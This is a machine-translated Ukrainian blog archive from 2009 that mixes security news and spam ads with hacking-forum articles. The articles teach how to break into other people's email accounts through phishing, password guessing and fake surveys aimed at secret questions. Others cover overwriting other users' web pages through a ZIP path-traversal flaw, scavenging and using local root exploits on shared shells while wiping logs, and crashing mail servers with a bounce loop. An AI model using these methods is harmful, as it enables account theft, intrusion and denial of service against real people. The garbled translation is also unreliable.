Чому ж американського експерта хвилює ситуація в далекій від США країні, де лише 20% населення має у своєму розпорядженні доступом в Інтернет? Виявляється, він переживає за рівень підготовленості самої Америки до таких атак.

Можна позаздрити рівнем патріотизму Джексона, якби не одна обставина. За однією з версій, причиною атаки проти киргизького інтернету вважають протест російських хакерів-патріотів проти присутності на території колишньої радянської республіки американської військової бази. І хоча російське посольство в Киргизії ситуацію не коментує, вспомнилось до місця рядок з вірша А.С Пушкіна: "Як нині сбірается вещій Олег помститися над нерозумним хазарам ...". Виходить, що відімститься.

http://www.internovosti.ru

Велике злиття на світовому ринку аутентифікації

2009-02-04T02:11:00.001-08:00

Компанія Aladdin Знання систем ТОВ (NASDAQ: ALDN), провідний розробник систем аутентифікації, продуктів і рішень для забезпечення інформаційної безпеки, оголосила про згоду увійти до складу високотехнологічного холдингу під управлінням найбільшої групи інвесторів Вектор Капітал ".
Днями інвестиційний холдинг Вектор Капітал досяг угоди з радою акціонерів компанії Aladdin Знання систем (АКС) про її злиття з компанією SafeNet, власником якої також є згаданий холдинг. До вже наявних у Вектор Капітал 14% акцій Aladdin, в результаті нової угоди було додано ще 19% на загальну суму близько 160 млн.. доларів. За оцінками експертів, дана угода здатна істотно змінити розстановку сил на ринку апаратної аутентифікації та захисту програмного забезпечення (ПЗ).
Угода з АKS стало логічним продовженням політики Вектор Капітал, яка за останні роки об'єднала таких відомих виробників, як WinZip, WatchGuard Technologies, SafeNet, Corel Корпорація LANDesk Software, Savi техніка, точний програмних рішень, Printronix, Register.com, Tripos та ін Будучи керуючим партнером, Вектор Капітал розробляє і впроваджує ефективні фінансові і бізнес-стратегії, здатні якісно поліпшити конкурентоспроможність що входять в холдинг компаній і збільшити їх ринкову вартість. Придбання акцій АКС забезпечує Вектор Капітал можливість зміцнити свої позиції на ринку аутентифікації, розширити лінійку пропонованих продуктів, а також отримати вихід на нові географічні ринки. При цьому в угоді з АКС особливий акцент зроблено на те, що всі торгові марки вендора, серед яких HASP, eToken, eSafe будуть повністю збережені як самостійні сформувалися бренди, що стали стандартами «де-факто» на профільних ринках. «Інтеграція АКС з такими гравцями ринку, як SafeNet і WatchGuard повністю узгоджується з нашою стратегією глобалізації», - сказав Шломо Янай (Shlomy Янаі), віце-президент "Системи знань Aladdin за напрямом eToken. «Важливою перевагою операції для нас також є можливість м'якого виходу на ринки США, Канади та Південної Америки» - додав він.

Злиттям АКС і SafeNet в структурному і стратегічному плані не внесе істотних змін в роботу російського дистриб'ютора АКС - компанії «Aладдін». Основні нововведення можуть торкнутися продуктової пропозиції, для розвитку і супроводу якого російський дистрибутор нарощував свій кадровий і технологічний потенціал у кінці 2008 року. Зберігаючи максимальну незалежність від вендора з погляду ведення бізнесу, «Aладдін» в результаті операції очікує появи інноваційних продуктових пропозицій, пов'язаних з припливом інвестицій в дослідну діяльність та інтеграцією з передовими технологіями SafeNet і WatchGuard.

Протягом трьох місяців угода між АКС та Вектор Капітал повинна бути підтверджена радою акціонерів компанії АКС. У випадку, якщо буде прийнято позитивне рішення, інформація про угоду направляється в антимонопольні органи, які розглянуть її законність.

Сайт для риболовів та мисливців .

2009-02-03T04:34:00.000-08:00

Сайт для риболовів та мисливців .
Тут можна знайти все, це дуже корисний сайт .
Тут навіть можна створити свою власну сторінку, чи замовити різні снасті для риболовлі чи полювання . Закачати GPS карти і просто карти .Замовити топові журнали по риболовстві і тд...
Мені як веб мастеру сподобався сайт своїм оформленням...
Як я завжди казав що саме головне це зручність і багато функціональність .
Сайт як в основном зроблений на 5-ть.
-"Мабуть не мало за нього виложили"
По більше-б таких сайтів.
Я пораджу всім хто хоч раз був на полюванні чи риболовлі зайти на цей сайт на ньом можна знайти багато чого цікавого !!!
блоги рыболовов,
охота в Украине
рыбалка в Украине,
форум рыболовов,

Як приховати свій IP ? (для новачків)

2009-02-02T00:37:00.001-08:00

На форумі часто запитують: «як приховати свій IP?» І їм відповідають: «Ісползовать анонімні проксі!» А як їх використовувати? А ось так: Спочатку потрібно ці проксі де-небудь найдті, потім налаштувати свій браузер на роботу з проксі. Де найдті проксі? та де завгодно! Просто введи в поисковике «Проксі + лист». Або зайди сюди:
http://www.samair.ru/proxy/
Далі налаштовувати браузер: заходиш в СЕРВІС / СВ-ВА ОБОЗРЕВАТЕЛЬ / ПІДКЛЮЧЕННЯ / НАСТРОЙКА і там Відзначивши галочкою ВИКОРИСТОВУВАТИ проксі-сервера (при цьому перевір, щоб використовувати автоматичне ВИЗНАЧЕННЯ налаштувань), далі в полі IP пиши IP сервера, і порт відповідно. Після цього жми ОК і можеш юзать проксі! Тепер перед тим, як з'єднатися з потрібним тобі вузлом твій браузер спочатку з'єднатися з проксі-сервером а потім відправить вже через проксі запит на потрібний тобі ресурс. Інша справа - це вибрати хорошой, швидкий, і анонімний проксі. Для тренування попробуй 195.68.95.209 порт 8080. Досить швидкий і Анонімний-преанонімний.

АЛЕ! Твій IP можна витягнути і через пошту. Щоб приховати IP у листі, так само використовуй проксі, але можна ще й:

1. Відправити анонімно пошту, використовуючи призначені для цього ресурси, наприклад: http://www.mafiamail.ru:8101/, http://tools-on.net/privacy.shtmll, http://anonymouse-master.org/, http://anonym-mail.host.sk/ ще можна пошукати в Яндексі "відправлення анонімної пошти", "Send anonymous mail" Для більшої анонімності можна ще при цьому скористатися Proxy або анонімайзером
2. Скористатися ремейлером, для цього потрібно надіслати листа на поштову адресу, наприклад remailer@replay.com, вказавши на початку тексту рядок "Anon-To: адреса одержувача". Потім повинна йти один порожній рядок і вже потім текст повідомлення. список ремейлеров на http://www.publius.net/rlist.htm
3. Ще можна налаштувати поштовий клієнт на роботу зі звичайним Proxy-сервером, робиться це за допомогою проги HTTPort.
4. Можна використовувати спеціальні програми для відправки анонімної пошти.
5. Так само можна пошукати "Анонімні SMTP сервери" і скористатися одним з них.
Перед тим як анонімно відправити кому-то лист, перевір чи IP-адреса буде приховано, надіславши листа себе.
Все! Тепер тебе ні хто не знайде.
Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

crack для софта новый warez скачать warez популярная музыка Свежие фильмы

Поради по взлому милов для початківців

2009-02-02T00:35:00.000-08:00

Вобщем товаріЩЩі ... хочу повідомити вам 3 ... точніше 4 способи злому скриньки яка-нить користувача. Ці способи описані мною тут спеціально для початківців хакерів, які не можуть придумать что нить серйозне і більш дієве, але котирим дуже треба зламати чию-небудь мило ... єдиний мінус цих способів-це те, що вони расщіпани на тупих користувачів (мається на увазі, що тупой юзер той, чий скриньку ви хочете зламати).
Спосіб Нумер Уно: всім вам добре відомий робот, якому потрібно ваш пароль, щоб він видав вам пароль вашої жертви ... просто пишете листа з заголовком ... ну наприклад ... Новий перевірений спосіб злому мильниць (краще мильниць не писати, поскоку той чол може не правильно зрозуміти і ...) так вот ... продовжуємо ... в писмь пишете. всяку фігню типу: "замість теми листа ви повинні ввести ** № # # @ 2136. ваш пароль *? 932!! Е-мийл вашої жертви (:52-2-9! Ваш Е-мейл (на яке прийде пароль жертви),, ... Отримуючи цей лист робот заглючіт і пошле вам пароль від скриньки жертви "ну і так далі ... головне писати з фантазією та заплутаний ... чтоб здавалося що це все правда ... головне написати що цей спосіб працює в різних місцях і для кожного сервак (Яндекс, меіл і т.д.) пишете адресу робота (це має бути ваш скриньку з розумним назвою типу Robotemail (для більшої переконливості ...))
З.Ы. для способу Нумер Уно: нету тут З.Ы.
Спосіб намбер ту: тупой підбір паролів ... для цього необхідно знати 2 речі: 1 що ваша жертва ооочень тупой юзер або просто лінюху (не плутати з твариною що живе в ... в общем где-то живе) ... 2 хоча б мізерні інфу про юзера, щоб приблизно знати що він міг написати ... але і без цих знань можна вгадати пасворд жертви ...
З.Ы. для способу на намбер ту: самі распростроненние паролі це: 1234567890, 987654321, 11111, 1945 Russia, PAROL, пароль, Password, пассворд та номер телефону користувача ...
Споcоб № Драй: для цього способу треба знати про користувача (чий мил' ви хочете зламати) поподробней ... і діє він струму на меіл ру ... по крайне мере в запропонованому мною варіанті ... ви можете просто гадати відповіді на секретне питання ... і угадайте вірний ... когда нибудь ... але легше скористатися наведеної на меіл ру Чудо-анкетою ... хто там бував знає про що я, а хто ні, так ента анкета виводиться при не правильно введеному відповіді на секретне питання ... там ви пишете все, що ви знаєте про користувача і спеціально виготовлений для цього мил' (приготовлений вами) куди і отошьется пароль користувача.
З.Ы. для способу № Драй: нету тут З.Ы.
Спосіб номер чотири: Кодове назва: Опитування Для тупих юзерів (ОДТЮ) вот тут ви можете писати все, що вам в голову взбредет ... головне щоб це був опитування тобто ви складає какую-нить модерних передісторію, мовляв це опитування створено там для чого нитку, та його результати будуть опубліковані там-то і там-то, можна також написати що це опитування проводиться серед обмеженого числа людей емейли яких вибрав какой-нить супер комп, ну всяке в цьому роді ... головне писати убедительно ... і серед питань ОДТЮ повинен бути секретне питання вашої жертви наприклад:
...
14. Ім'я вашої собаки
...
юзер забуває геть які у нього там питання секретні на мило стоять і радіючи можливості взяти участь в опитуванні ... адже ні кожен день такий випадок випадає (:])... і він відповідає на всі питання (включаючи той що його секретний) і посилає відповідь на ваше мило, яке ви вказали в ОДТЮ ... адреса вашого мила теж повинен модерних ... наприклад Opros.... ru от і все ... легко і просто ... головне щоб фантазія була ...
З.Ы. для питання номер чотири: на просунутих користувачів це не діє недарма він називається Опитування Для тупих юзерів ... хоча іноді навіть у досвідчених користувачів зносить башту при такій можливості ... 98% користувачів пишуть відповіддю на таємне запитання правду ...
З.Ы. загальний: не звертайте уваги на граматичні помилки допущені мною ...

Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

2009-02-02T00:17:00.000-08:00

Привіт усім новачкам ХакЗони. У цій статті я збираюся розповісти про протокол POP3 в Delphi-додатках. Як це відноситься до хаку? - Запитаєте ви. Да по-різному. Можливо, кому-то захочеться написати брутфорс, а кому-то свій власний поштовий клієнт, кто-то просто захоче зрозуміти як працювати з POP3 в Delphi, а кто-то хоче видалити всі повідомлення зі свого вконец разбомбленного скриньки ... Взагалі, застосувань куча.

Отже, почнемо. Користуватися ми будемо компонентом зі сторінки FastNet під назвою TNMPOP3. Як ви вже зрозуміли, цей компонент застосовується для отримання листів від POP3-сервера. Ніяких складностей у поводженні з ним немає, всю роботу Delphi, як зазвичай, виконує за нас. Почнемо.

Підготовка.
Перед прийомом повідомлень потрібно задати значення властивості Host (ім'я поштового сервера або його IP-адреса), а також значення властивостей UserID і Password (ім'я користувача і пароль). Потім потрібно викликати метод Connect, який встановить з'єднання. При невідповідності UserID / Password відбувається генерація подій:
OnAuthenticationFailed (якщо введено неправильний пароль або невідоме серверу ім'я)
OnAuthenticationNeeded (якщо пароль не вказано або в UserID не вказано ім'я користувача)

Якщо ви успішно пріконнектілісь до сервера, то автоматично встановлюється властивість MailCount, що показує кількість повідомлень у вашому (або не вашем) скриньці.

Одержання пошти.
Далі потрібно отримати пошту. Це робиться методом GetMailMessage (N: Integer), де
N - комер повідомлення. Але перед його викликом потрібно встановити властивість DeleteOnRead, що відповідає за видалення прочитаних повідомлень (якщо його значення True, тоді після прочитання листа, повідомлення з сервера видаляється з сервера, якщо FALSE - то немає), а також каталог для вивантаження приєднаних файлів у властивість AttachFilePath ( якщо значення не задано, то файли будуть
розвантажуватися в каталог, з якого виконується програма).
Отже, викликав GetMailMessage. Після цього автоматично встановлюється значення
властивості MailMessage. Воно включає свої власні властивості:
Attachments - імена вкладених файлів
Body - текст листа
From - адреса відправника
Head - заголовок листа
MesageID - унікальний ідентифікатор листа
Subject - тема листа

Практика.
Вот, в принципе и вся теоритическую частина, тому далі я наведу фрагменти програми. Отже, створюємо форму, кладемо на неї NMPOP3, три TEdit (для сервера, ім'я користувача і пароль) і кнопку для початку
з'єднання, до якої пишемо такий обробник OnClick:

NMPOP31.Host: = Edit1.Text;
NMPOP31.UserID: = Edit2.Text;
NMPOP31.Password: = Edit3.Text;
NMPOP31.DeleteOnRead: = FALSE;
NMPOP31.Connect;

Тепер додаємо ще чотири TEdit (для введення номера потрібного листа, для виведення адреси відправника, теми листа і идентификатора листа) і два TMemo (для заголовка і тексту листа). Додамо кнопку, при натисканні якої ми будемо отримувати потрібний лист. До неї пишемо такий обробник:

VAR
N: Integer;
if NMPOP31.MailCount> 0 Then
BEGIN
N: = StrToIntDef (Edit4.Text, -1);
If (NNMPOP31.MailCount) then ShowMessage ( 'Wrong number')
Else
BEGIN
NMPOP31.GetMailMessage (N);
Edit5.Text: = NMPOP31.MailMessage.From;
Edit6.Text: = NMPOP31.MailMessage.Subject;
Edit7.Text: = NMPOP31.MailMessage.MessageID;
Memo1.Lines.Assign (NMPOP31.MailMessage.Head);
Memo1.Lines.Assign (NMPOP31.MailMessage.Body);
End;
End;

Після закінчення роботи потрібно відключитися від сервера, що робиться за допомогою методу Disconnect.

Ну ось, в принципі, і все. Тепер ви можете з успіхом користуватися POP3 в
Delphi.

P.S. Так, я ще про чистку забомбленних скриньок говорив, так вот, лист видаляють
за допомогою методу DeleteMailMessage (N: Integer), яке прибирає повідомлення з номером N з поштового сервера.
Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

Ховаючи IP свого сайту

2009-02-02T00:16:00.001-08:00

Варто розмістити в Мережі інформацію, зачіпають чиї-небудь інтереси, як на адмінів сервак тут же починають кричати СВЕРХУ: "Заберіть цю хрень, поки ми зовсім вас на фиг не закрили!". Подивимося, як можна подгадить любителям наступити на горло чужій пісні, приховуючи від їхніх очей адресу своєї сторінки. Самий звичайний IP адреса можна замаскувати так, що навіть яйцеголових специ з комп'ютерної безпеки будуть довго чесать репи в тяжкой думку, расшіфровивая загогуліну вроде http://ftp:128.03.60.23 @ 3558% 3351% 3040. А що вже казати про простих смертних!

Формати адреси
Отже, кожен IP-шник складається з чотирьох байт (дорога, хочеш я тобі розповім, що таке байт?), Розділених крапками. Наприклад, сайти http://www.chat.ru/ і http://www.geocities.com/ мають адреси 212.24.32.192 і 209.01.224.18 відповідно. Що набирати в браузері: більш зручне символьне ім'я або строку http://212.24.32.192 - справа смаку кожного користувача. Останній спосіб залишає масу можливостей змінити IP своєї сторінки до невпізнання або створити ілюзію звернення зовсім на інший сервер.

Шістнадцятковий трюк
Запустимо програму Calculator зі стандартного набору Windows (хоть что-то юзабельное з виндов) і послідовно перетворимо кожен байт, що входить в адресу, в шістнадцятковому (HEX) значення. Отримаємо D4.18.20.C0 для www.chat.ru і D1.01.E0.12 для www.geocities.com. Тепер можна посилатися на свою сторінку за цим значенням, набираючи в браузері http://0xD4.0x18.0x20.0xC0. Дізнатися IP адреса стало складніше, але ще, як то кажуть, не фонтан: будь-який, хто коли-небудь бачив програми на С або Assembler, відразу здогадається, в чому тут трюк. Кращий спосіб взяти всі чотири байтів D41820C0 і перевести їх у десяткове (DEC) значення. За що одержав числа також можна посилатися на сайт з адресою www.chat.ru: http://3558351040/.

Восьмерічний трюк
Ще один варіант, зазвичай збивають з пантелику навіть матерів сісопов - перевести кожну складову IP адреси не в шістнадцятковому, а в восьмерічное (Oct) значення. Той факт, що число, що починається з 0, трактується програмами як восьмерічное, відомий далеко не всім: адреса http://0324.030.040.0300 дає бажаний результат.

А скільки це буде у відсотках?
Тепер можна поступово ускладнювати отримані адреси, додаючи нові елементи скритності. Відомо, що текстова інформація, що передається браузерами разом з URL, перед посилкою по Мережі піддається деякої обробці. Так, наприклад, всі символи Space (пробіл) замінюються кодом% 20. Те ж саме можна зробити з будь-яким символом свого адреси. Щоб отримати необхідний код цифри, достатньо додати до неї 30. % 33 буде відповідати цифрі 3, а% 30 - 0. Підправив отриманий раніше десятковий адресу. Тепер http://3558% 3351% 3040 також містить посилання на www.chat.ru, хоча виглядає вже досить устрашающе.

Ось де собака порылась!
Наступний рівень складності у благородній справі запутиванія слідів вносить додавання в URL символу @. Стара добра "собака" тут не має ніякого відношення до E-Mail, її роль - передача на сервер Login-A і пароля: якщо сервер містить запароленние каталоги, звертатися до них слід так: http://login:password @ URL. Додавання ж "собаки" до звичайного адресою, яка не має ніякого відношення до секретності, змушує браузер просто ігнорувати все, що передує символу @. Таким чином на сервер www.chat.ru ми можемо потрапити, набравши, наприклад, адреса http://12345435374683434809080 @ 3558351040 або http://ftp:128.03.60.23 @ 3558% 3351% 3040

Головне правильно вибрати ім'я!
Але й це ще не межа: заплутати переслідувачів можуть правильно обрані імена каталогів і файлів на сервері. Назвав свою сторінку 203356.htm або ftp.123.0.12.34.htm, можна збити з пантелику будь-якого: http://12345435374683434809080 @ 3558351040/ftp.123.0.12.34.htm. Нагадаємо, що обмеження на довжину назви файлу або каталогу - 256 символів, що означає можливість конструювання, наприклад, такого монструозного URL: http://12345435374683434809080 @ 3558351040/23232323239200596/3232908576579404323 /
123.htm.

Ховаючись в Рунеті
Якщо є можливість, можна зареєструвати свій домен з ім'ям "чіслітельним", наприклад, 2323.ru або 909093290.com. У зоні RU вже зареєстровані 100.ru або 777.ru. Наплодили в такому домені "цифрових" піддоменів, можна отримати адреси на кшталт: http://121.3434.23.2323.ru/121.223.231.ru/2323.12.89.32.ru/ru.htm.

евакуація автомобілів в Москві

2009-02-02T00:06:00.000-08:00

ВВГ компанія пропонує послуги з цілодобової евакуації автомобілів в Москві. Велика кількість евакуаторів, низькі ціни.

В дорозі може трапитися всяке, дзвінок у службу евакуації і замовлення евакуатора - це прохання про допомогу у важку хвилину.
Саме в цю важку хвилину ми виручить Вас гарантовано!
До Вас приїдуть досвідчені водії на нових евакуаторах японського виробництва, дбайливо занурять Ваш автомобіль, оперативно доставлять його в будь-яку точку Москви чи Росії! При навантаженні на евакуатор і подальшої евакуації авто, гарантуємо доставити Вашу машину до місця призначення в цілості й схоронності.
эвакуатор Москва услуги эвакуатора эвакуация авто вызов эвакуатора

Дефейс у пров за допомогою ZIP-архіву

2009-02-02T00:04:00.000-08:00

Ця стаття посвещается, тим хто хоче замутити свій хостинг з можливістю на ньому розпаковування ZIP-архівів, або тим хто хоче ломануть хостинг з такою можливістю ;-) У цій статті ви зможете дізнатися про одну дірку за допомогою якої можна закачувати файли і папки в чужі акаунти зі свого =)) Якщо зацікавилися, то читайте далі.
Intro
Усе почалося з ідеї створити чат, доступний з гостьового входу. В якості провайдера був обраний Центральний Телеграф, так як коннект з ним завжди з першого разу і дуже рульная. Даний пров дає 1 Мег під пагу, якщо купити инет карту, що ми і зробили. Далі виявилося, що CGI / ASP / PHP ЕТС. заборонені, можна юзать тільки готові скрипти (які, природно, якістю не вражають). Скрипту чату серед них, звичайно, не було, і ми вирішили заюзать під ці цілі скрипт гостьової книги або форумів. Через деякий час чат був готовий, але, після пари тижнів, було вирішено, що чат зроблений лажово - для входу потрібно зареєструватися у нас, без цього - тільки під ім'ям Guest і т.п. заморочки. Загалом, було необхідно переробляти. У ЦТ класти файли на пагу можно только если у тебя что-то є на рахунку, а у нас (так достоверно и неизвестно почему) зняли останні 15 хвилин, які лежали там спеціально для доступу до паге;). Вирішили не класти грошей на цей рахунок, а зробити все по-новому, з чистого листа, так би мовити. І зробили, все круто і зручно, тільки от встала одна проблемка - як би закинути на старий сайт index.html з посиланням на новий? Доступ-то до старого заборонений! (NivaX: Тут обмовлюся - в старому чаті накопичилося певну кількість заслужених чатлан - класні, перевірені друзі, і дуже захотілося побачити їх на новому сайті) А раз проблемка встала - впору пошукати рішення. І ми стали шукати, як би можна отримати доступ на запис у файли інших ПАГ. Все, довге і нудною Інтро закінчилося. ;)
MAIN
Тепер, власне, про знайденому баге. На пагі ЦТ доступ тільки через веб-інтерфейс: (, а щоб не свіхнуться, качая тучу файлу, придумана там гарна система: пакуешь файлів у ЗИП, кидали ЗИП через веб-інтерфейс, а там є така кнопка - розпакувати. Ось і прийшла ідея , що распаковщік у них, напевно, якийсь кривий-доморощений. Так і виявилося. При перевірці на вошивість було виявлено наступне:
Якщо розпаковує файли вже існують, то вони перезаписувати без запиту;
Архівер все розпаковує зі шляхами;
Мало того, що з шляхами, так шляху ще й не перевіряються на наявність точок і слешей!
Таким чином, з'явилося два способи досягнення мети. Перший, ясний перець, грунтувався на підробці шляхів - створювався каталог з ім'ям з двох символів, в ньому - каталог з ім'ям пагі, на яку передбачалося залити "оновлення":)), а в цю папку вже клали сам файл для заливки. Перший каталог пакували в ЗИП, ЗИП відкривався з HIEW или чего-нить еще, два горезвісних символу в назві папки замінялися на дві точки у всіх місцях, де були знайдені в зіпе. Другий спосіб майже такий же - створювався фото з довгим ім'ям, початок якого потім замінюється на точки і слеші. Наприклад, щоб залити index.html на пагу по імені vaspupkin, створюємо фото:!! _vaspupkin_index.html З необхідним змістом, пакуем в ЗИП, потім в HEX-редакторі змінюємо "!!" на "..", а "_" на "". Кидай, розпаковує, отримуємо результат:)). Звичайно, можна було писАть в будь-який файл, на який є право доступу на запис, але наша мета була інша. Після зміни індексу на старій паге ми заспокоїлися і откаталі пісьмецо админам, щоб пофіксено. Ось, начебто, і все про баге;)
OuTTRo
В общем-то, зародок цієї ідеї прийшов зі світу BBS і Fido, де ми балували підробкою шляхів у *. ZIP-пакетах, розпаковує автоматично. О, це було солодко! :)) Адже BBS і поінти часто під DOS / Windows, а там можна було поправити ім'я файлу на com1/com2 (модем завалений мегамі даних:), prn (принтер, якщо включений, звичайно:), ну і звичайно ж улюблений CON ( висновок прямо в консоль), а код 07h при виведенні в консоль - гнусный спікерний звучок;)). Потім ідея підставити визод на рівень вище в ЗИП, прийшла спочатку до NivaX'у, була виправлена і дороблена, і ось на виході результат. Ну що, допіл пиво?

ЗЫ: На ЦТ цей баг пофіксено після нашого листа, а от якщо знайдеш інших прово з розпаковування архіву - прапор тобі в руки;). І пам'ятай: архів - необозрімое поле діяльності!
Шлях усунення цієї дірки: встановлювати більш свіжу версію ZIP-архіватора.

Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.

Як дістати експлоіти # 2

2009-02-02T00:03:00.000-08:00

Ця стаття - невелике доповнення до статті nekd0 "як дістати експлоіти".
Найголовніший облом тут може статися після того, як доступ через ftp звичайним юзером до своєї домашньої директорії виявиться заборонений, а то й зовсім FTP сервера не буде.
Доведеться ручками лазить по директоріями, що з боку буде виглядати досить маразматічно. Можна спробувати пошукати файли за шаблоном у юзерскіх директоріях. Наприклад, за допомогою Locate і Find.
До речі, на Шелл існує така противная штука, як таймаут, тобто якщо нічого не робиш протягом певного часу (звичайно 2-5мин.), То сервер сам розриває з тобою з'єднання, а отже, процес пошуку теж автоматично вбиває. Так що потрібно надсилати процес в бекграунд з допомогою символу & наприкінці команди. Процес тоді буде працювати навіть після того, як ти вийшов з Шеллі. Але результати мають відображатися на екрані, а якщо ти вийшов, то природно, нічого не відобразиться. Отже, потрібно записувати результати у файл. На всяк випадок создешь в Хом директории какой-нибудь log.txt за допомогою команди touch log.txt. У підсумку команди повинні виглядати так:
CD ~
touch log.txt
Find / Home-Name *. C>> ~ / log.txt &
Можна теж саме, але з допомогою Locate.
Якщо хто не знав, Тильда - це домашня директорія.
Але адмін може зняти атрибути з Find і Locate, тоді за запитом вони тобі будуть видавати всі файли та директорії, до яких у тебе є доступ. Файлік вийде відповідного розміру. Потім вже можеш розсортувати цей файл простим grep'ом. Отож, у підсумку цих мук ти побачиш теці з експлоітамі. Хоча це може бути і my_first_program.c, що виводять Hello, World! =). А деякі залишають тільки скомпіленние проги без исходников. Їх ти вже без всяких приколів используешь на свій страх і ризик! До речі, не недо вандальнічать в цих директоріях. Юзер адже може інколи оновлювати свою колекцію ...
Також трапляються деякі екземпляри користувачів, які ставлять на свою директорію 700 біт, тобто доступ до папки дозволений тільки власнику. А деякі ставлять взагалі нульовою, то есть доступ заборонений для всіх. Потрапити в такі директорії - саме солодке, хоча деякі ставлять такі біти просто для прикол.
На Шелл провайдерів, особливо на безкоштовних, лежить багато local root exploit'в, адмін на них поступово починає забивати, особливо якщо на сервак зар кілька тисяч користувачів. Рута систему всі, кому не ліньки, можеш і ти теж за компанію ... З нульовим уідом ти облазив всі папки та почернешь для себе багато корисної інформації, наприклад базу з мильнікамі. Не забудь Логи Почистіть, або просто проксі пользуйся, врядли тебе админ тоді наченет обчислювати, якщо ти ніего такого не сделал.А якщо навіть Шелл отнимут - не біда, новий зар.
Але все було б це добре, але от якщо навіть телнета немає. Наприклад Хостер какой-нибудь. Всі собі телнет зар, а у тебе зайвих 10 баксів не знайшлося. Загалом ситуація така, що у всіх є телнет, а у тебе тільки місце під сторінку з виконанням CGI-сценаріїв. Ftp, звичайно має бути, але там вже точно доступ тільки в свою дірекуторію. Що ж, теж непогано. Можеш лазити по директорія з правами
веб-сервера. Як? Є така штука web shell. Вона дозволяє виконувати команди через Web. Навіть якщо на директоріях користувачів коштує 700 біт, сервер туди все одно пролезет (скрипти ж йому потрібно виконувати). Повторювати всі описані вище дії, архівіруешь, зливають по вебу через проксі яким-небудь FlashGet'ом. Але учті, адмін буде не в захваті, побачивши у тебе такий сценарій ... Так що шифруються.
Да не помітить тебе Root:)

P.S. Скрипт цей дати не можу - сам шукаю ...

Хакерство, книги хакерства, як стать хакером, взлом почти.

Як дістати експлоіти.

2009-02-02T00:01:00.000-08:00

Ось просканіл ти сервак свого кровного ворога і бачиш, що у нього стоїть на 21 порту WU-ftpd v2.6.2 (к примеру). Ти рад до втрати тому що знаєш, що цей сервак можна поиметь через FTP порт. Але де дістати експлоіт під цю вразливість? Так, раніше мене теж мучали це питання, але зараз я знаю величезна безліч способів їх дістати абсолютно безкоштовно, може бути навіть приватні отримати.
Спосіб перший (найвідоміший): йдеш на який-небудь західний Хак-сайт і вводити в поле пошуку те, що тобі потрібно заексплойтіть. Тут тобі відразу вискакує безліч посилань, а ти вже потрудились знайти серед них те, що тобі потрібно.
Шукати сплоіти тут:
www.packetstormsecurity.nl
www.hac1k.co.za
www.sнcurityfocus.com
www.mazzzafaka.ru

Спосіб другий (менш популярний): Ти йдеш на відомі
трейдерські канали і клянчішь там чего-нить, а може і
сам трейд якщо є чим. Але тут треба добре по
англійської парить, адже там тільки по англійськи
можна.
Заходи сюди: # darknet
#! mafianet

Спосіб передостанній: якщо ти сидиш під виндой, то тебе
приходиться, перед тим як ломануть сервак, закачати на
Шелл експлоіт і скомпіліть його. Дійшло? Все геніальне --
просто. Хіба ти один такий супер хакер? Наверное кто-то
крім тебе на Шелл теж тусуіться, чатітся, сервак кладе.
Можна і у нього сплоітов запозичити. Береш звичайний FTP
клієнт, налаштовувати з'єднання до Шеллі на свій акаунт,
а потім просто ЛАЗу по директоріях і шарішь на наявність
файлу з розширенням. C,. PL і ETC). Звичайно спосіб не дуже
продуктивний, відсотків 70, а то і 80 всього скаченого
виявляється сміттям, а ось решта 20 сплоітамі, причому
реальними. Ти скажеш: як я за допомогою FTP попаду не до себе в
діру? Дуже просто. На сервак, що надають Шеллі
можна побачити навіть / с юідом звичайного юзверя.
А якщо там админ че напутал, то може удасться утащила і
ETC / passwd.

Спосіб останній (самий важкий): сам напиши сплоіт.
Не получиться? А ти пробував? Ні? Ось і спробуй!

Удачи.
Хакерство, книги хакерства, як стать хакером, взлом почти.

Вішаємо сервак

2009-02-01T23:59:00.000-08:00

Вам всем знаком протокол SMTP - для пересилання пошти. Іноді, відправляючи повідомлення на адресу і зробивши помилку, ви отримували відповідь від сервера з позначкою, що лист доставити не вдалося. Здавалося б, абсолютно нормальна річ. Але ... тут я трохи піду від пояснень принципу роботи sendmail'a і звернуся до оптичної фізики. Коли в стержні лазера утворюється Квант, летить строго паралельно оптичної осі, скажімо, рубінового стержня, то стикаючись з атомами цього стрижня Квант буде вибивати з них інші кванти, що летів строго паралельно йому. Долетить до одного дзеркала, кванти відображаються і летять назад, нарощуючи свій число в геометричній прогресу. Кванти долітали до другого дзеркала, відображаються ... процес повторюється.

Коли ми відправляємо з адреси non_existent@test1.com листа на адресу non_existent@test2.com sendmail на сервері test2.com бачить, що лист не може бути прийняте (такого користувача немає і в помине) і відсилає лист обрати, додавши туди повідомлення про дату , часу помилки USER NOT FOUND. Лист повертається на домен test1.com, обростає додатковою інформацією ... процес повторюється

Коли кількість квантів, що носять туди-сюди досягає критичного межі, то у пучка в сукупності набирається достатньо потужності, щоб "вискочити" за напівпрозоре дзеркало і зробити корисну роботу - пробити отвір у мікроподшіпніке або ж спалити ворожий космічний корабель.

Коли об'єм листа зростає настільки, що, ходячи між test1.com і test2.com на його передачу йде левова частка наявного bandwidth'a, один з серверів не витримує навантаження і падає. Я особисто спостерігав за процесом, як пінг до одного з доменів збільшувався, збільшувався ... поки не почався суцільний timed out.

У випадку електротехніки, ми маємо абревіатуру Light Amplification by the Stimulated Emission of Radiation. (Усліеніе світла в результаті вимушеного випромінювання), що і читається як LASER. У випадку IP-мереж ми маємо так само типовий лазер з робочим тілом у вигляді каналу, квантами у вигляді листа і дзеркалами в особі test1.com & test2.com.Только енергія використовується не на благо партії, а на те, щоб звалити сервер. Або обидва. А тепер - сценарій у дії:

$ Telnet some.mailserver.com 25

220 ESMTP (Sendmail 8.8.9) Ready
HELO www.test1.com
250 OK
MAIL FROM: non_existent@test1.com
250 user non_existent OK
RCPT TO: non_existent@test2.com
250 reciptient non_existent OK
DATA
354 Send data. End with CRLF.CRLF
blah

QUIT
Хакерство, книги хакерства, як стать хакером, взлом почти.

Глюкан Вікно

2009-02-01T23:56:00.000-08:00

Я незабаром угадай у вас є сусід, який працює на вікнах або в вашому универе або школі, буде кватирки.
Якщо бути те, що Я думаю, що Ви цікавий погляд на реакцію удрученную, коли з винды почнуть зникати свої стандартні компоненти.
Ви напевно знаєте такий фішку як реєстр, так що тут це відкриває нам багато можливостей в установці кватирок.
Тиснемо Нашу улюблену кнопку Пуск знаходимо там пункт "Виконати" і пишемо "Regedit".
Ніяке спеціально для такого хто боїться цю команду або щоб Ви не спалили можливий, потрібно створити типо файлік kill.reg Але в нього записати

REGEDIT4

